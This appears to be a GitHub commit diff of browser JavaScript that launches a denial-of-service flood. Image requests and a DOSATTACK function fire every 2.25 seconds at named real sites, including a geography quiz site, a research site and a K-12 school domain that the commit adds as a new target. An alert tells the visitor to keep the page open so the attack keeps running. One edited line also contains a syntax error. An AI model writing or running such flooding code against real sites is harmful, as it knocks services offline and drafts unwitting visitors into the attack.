File tree Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Original file line number Diff line number Diff line change 1
1
alert ( "Sending an attack =D, so just do what you want but leave this site open or else it'll stop the attack" ) ;
2
2
3
- function imgflood ( link ) {
3
+ function imgflood ( link , uri ) {
4
4
var TARGET = link ;
5
- var URI = '/geography/africa-quiz.php' ;
5
+ var URI = 'uri ;
6
6
var pic = new Image ( ) ;
7
7
var rand = Math . floor ( Math . random ( ) * 1000 ) ;
8
8
pic . src = 'http:' + TARGET + URI + rand + '=val' ;
@@ -18,8 +18,9 @@ setInterval(function(){
18
18
}
19
19
20
20
setInterval ( function ( ) {
21
- imgflood ( "https://lizardpoint.com" ) ;
22
- DOSATTACK ( "jihadology.net/" ) ;
21
+ imgflood ( "lizardpoint.com" , "/geography/africa-quiz.php" ) ;
22
+ imgflood ( "ls-child.mvcsc.k12.in.us" , "/index.php" ) ;
23
+ DOSATTACK ( "jihadology.net" ) ;
23
24
DOSATTACK ( "ls-child.mvcsc.k12.in.us/log_in" ) ;
24
25
} , 2250 ) ;
25
26
You can’t perform that action at this time.
0 commit comments